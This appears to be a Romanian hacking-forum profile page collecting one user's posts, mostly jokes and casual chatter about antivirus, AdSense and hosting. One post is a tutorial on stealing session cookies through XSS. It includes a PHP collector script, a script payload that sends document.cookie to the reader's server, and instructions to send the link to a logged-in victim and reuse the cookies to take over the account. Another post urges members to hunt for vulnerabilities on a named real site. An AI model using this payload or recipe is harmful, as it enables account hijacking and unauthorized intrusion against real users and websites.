-
Posts
1563 -
Joined
-
Last visited
-
Days Won
8
Everything posted by crs12decoder
-
Definitiile lui Murphy privind sistemele computerizate: Hardware: Acele parti ale sistemului pe care le poti lovi cu piciorul. Software: Acele parti ale sistemului care nu functioneaza. Hard disk: Acea componenta a sistemului care intepeneste in momentul cel mai nepotrivit cu putinta. Periferica: Acele componente care sunt incompatibile cu sistemul tau. Imprimanta: Acea componenta a sistemului care se blocheaza cand nu te uiti la ea. Cablu: Acea parte a sistemului care e prea scurta. Backup: O operatie care niciodata nu este efectuata la timp. Restaurare: O precedura care functioneaza perfect pana cand e nevoie de ea. Memorie: Acea parte a sistemului computerizat care este insuficienta. Mesaj de eroare: O solicitare de aprobare a distrugerii propriilor tale date. Fisier: Acea parte a sistemului care nu poate fi gasita. Procesor: Acea componenta a sistemului computerizat care este depasita tehnologic.
-
cum visrusezi la unu PC doar accesand o pagina
crs12decoder replied to lexx's topic in Cosul de gunoi
MHOAMA DOAMNE.. da cum am putut fi atat de tampit sa nu vad asta de-a lungu timpului.... doamne ce bine acu ca am observat.. ba da chiar ba! -
NOD32 cel mai bun AV + 45.000 ani gratis ;)
crs12decoder replied to Gonzalez's topic in Programe securitate
nu folosesc niciun AV sincer sa fiu.. ma dispera toate... si asa cand imi instalam unu ii dadeam disable asa ca am zis sa nu mai instalez. Sunt atent de unde iau fisiere executabile si gata nu mi-ar mai veni sa folosesc windows deloc da imi place ca rezolvi treburile usor si repede cu el. ca in rest e la pamant -
ok.. toti stiu site-urile cu animale,porci,matze,melci,crocodili si dinozauri pe care trebuie sa-i cresti oferindu-le pe mess prietenilor tai un link catre site pe care ei tre' sa dea click ca tu sa ai un vot in +. So am vazut si e-pets.ro. Server Side Script-u e ASP. am fost curios sa vad cine care cum unde cand si am gasit asta: Domain Name: e-pets.ro Registrar: Romarg SRL Whois Server: http://whois.rotld.ro Referral URL: http://www.inregistrare-domenii.ro romarg srl e o firma de domenii+hosting deci in principiu sunt aproape sigur ca site-u nu este facut de o firma pt jocuri online.. si mai mult de un tip sau un grup de tipi. so.. cine gaseste cele mai multe vulnerabilitati pe el?
-
nu te rade!... baiatu are potential... + ca ai o ipoteza...
-
ma.. first.. nu face double post... second.. CTR este calculat prin numaru de useri care iti viziteaza site-u impartit la numaru de click-uri date pe AD.. in cazul tau feed. nu o sa-ti inchida contu.. din 2 useri ti-au dat 2 click.. si normal ca e ctr-u de 100% .. asta pentru ca fiecare user a dat un click pe ad-u tau... Problema apare doar cand ai multe vizite(de ordinul sutelor sau miilor) si ai ctr-u mare... pentru ca google crede ca sunt sanse foarte foarte mici ca 50% din 4000 de oameni..(adica 2000) sa-ti dea tie click pe ad. dar daca sa zicem ca ai un singur user ce-ti viziteaza site-u... nea gigi.. si da click de 3 ori pe adsense.. o sa ai evident CTR-u de 300% dar e vb doar de nea gigi ala... nu de 1000 de nea' gigi.. si gugle nu zice nimic.... intelegi tu?
-
ce e RFI, cu ce ajuta, cu ce se mananca
crs12decoder replied to paxnWo's topic in Tutoriale in romana
cum era sa le enumar pe toate .. am enumerat 2 care mi s-au parut mai importante -------------------- da... cel putin acu nu se mai lucreaza cu module pe baza de variabile date de user dar totusi sunt site-uri...... -
anunta-ma si pe mine cand nu-ti faci publicitate la site pe forumu asta
-
e pe baza de tamper data ... hai ma fratele meu fii serios nici site-u lu nea' gigi instalatoru care a invatat de curand sa faca hello world in php nu ar fi atat de tampit incat sa se bazeze 100% pe informatiile venite din client side... pretu este stabilit server side si este afisat client side... degeaba ti-ar aparea tie acolo ca platesti 0.1$ ca tu tot 1000$ platesti...
-
hai ma.. fi serios ce kkt... park ti-ar trebui 10 tone de inteligenta sa scoti cursoru' de pe .swf screen... credeam ca cine stie ce e
-
nu e vb de.. "binisor" adica nu e bine daca ai high score... nu neaparat bine... daca ai scor mare atesta faptu ca esti o mare jigodie
-
daca ma poate ajuta cineva cu un acces pe un server linux(nu am pretentii prea mari) cu conexiune la net minim 6 mb up/down.. ofer simpatie maxima si respect profund...
-
bittorrents.ro mi s-a parut cel mai fain.. nu stiu cum e iplay.. ma ajuta cineva sa stiu eventual?
-
esti cretin? @black: cool shit .. stiam cheat engine-u de mai mult timp.. il foloseam pentru diverse chestii.. stiam ca merge si la jocuri flash da sincer sa fiu pe conquiztador nu l-am incercat... thx
-
lasa ma ca o sa ajungem sa ne ingropam sub pamant calculatoare si sa punem pe ele explozibil si sa ne conectam la ele si sa operam de pe ele totu' si daca e vreo chestie naspa "bum" si s-au dus informatiile.... (da.. stiu.. prea mult uplink )
-
il stiu de mai mult timp.. doamne ce distrusi .. cum draq or fi avut atata rabdare sa deseneze caracter cu caracter tot rahatu ala ...
-
atatea commenturi intr-un topic porn .. nu ma mir de ce are industria xxx atata succes
-
ma spal pe dinti,scoala,yahoo,rst,lucrez la proiect,mananc,wc,civ4, lucrez la proiect, dorm
-
da ma si totusi.. ganditi-va cat le trebuie astora de la cosmote,orange,zapp,romtelecom,vodafone si tot ce inseamna internet si telefon sa poa' sa stocheze timp de 6 luni toate convorbirile,sms-urile si datele trimise pe internet... e aproape imposibil de imaginat asa ceva.... in locu lor m-as apuca si as face o conferinta si ar cadea toti la comun de acord sa nu faca chestia asta pentru ca e pur si simplu..... prea costisitor. Si dupaia sa vedem ce fac parlamentarii ca de scos nu au cum sa-i scoata de pe piata.. ca romania fara telefoane si internet e ca pe vremea lu papura voda cand se vanau sobolani cu arcu
-
sa inteleg ca sunt toate extensiile la un loc?
-
bullcrap ) l337 nu inseamna neaparat nerdy moth'a fuck'a.
-
w3schools - Invatza acasa ( offline mod )
crs12decoder replied to CODEX's topic in Tutoriale in romana
bun,bun chiar aveam nevoie -
Cum sa exploatezi un xss dupa ce l-ai gasit
crs12decoder replied to crs12decoder's topic in Tutoriale in romana
1) nu sunt nub si te rog frumos sa nu te mai legi de mine. Daca ai ceva frumos de zis, zi daca nu, abtine-te si nu ma mai jignii.. deja m-am saturat cate rahaturi ai zis si eu am tacut. Eu nu m-am legat de tine in niciun fel si te rog sa faci si tu de asemenea. Nu oblig pe nimeni sa ma placa da nu-mi place sa fiu jignit ok? 2) e scris de mine cap-coada.. . Daca era copy-paste de undeva mentionam sursa. nu sunt genu care se lauda cu munca altuia. Personal nu ma intereseaza parerea lu' codex despre mine atata timp cat stiu ce e al meu. Mi s-a parut ca majoritatea tutorialelor sunt explicate intr-un mod mai greoi si multi incepatori pun intrebari ori pentru ca nu cauta, ori pentru ca nu inteleg... atata tot.. ar trebui sa fie selectionat unu dintre tutoriale si sa fie postat undeva pe forum unde va fi mai vizibil pentru ca sunt sigur ca cel putin 60% din cei care se uita pe forum nu au idee cum se extrage un xss in concret cam asta era ideeasper ca de acum vei inceta cu jignirile. -
Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag. XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele. Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php: <?php $cookie = $HTTP_GET_VARS["cgrab"]; $fh = fopen('cookies.txt', 'a'); fwrite($fh, $cookie . "\n\n"); ?> Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit "cookies.txt" si aveti grija ca acesta sa aiba drepturi de read si write. Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma <script>alert('xss')</script>. Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta: <script>document.location="http://www.site-ulmeu.com/grab.php?cgrab=" + document.cookie;</script> trimiteti link-ul cu xss-ul unui anumit user(care voi credeti ca este logat) iar cookie-ul va fi salvat in http://www.site-ulmeu.com/cookies.txt trebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau.
-
mai bine iti faci tu propriul algoritm de criptare.. stii sigur ca sunt sanse minime sa fie decriptat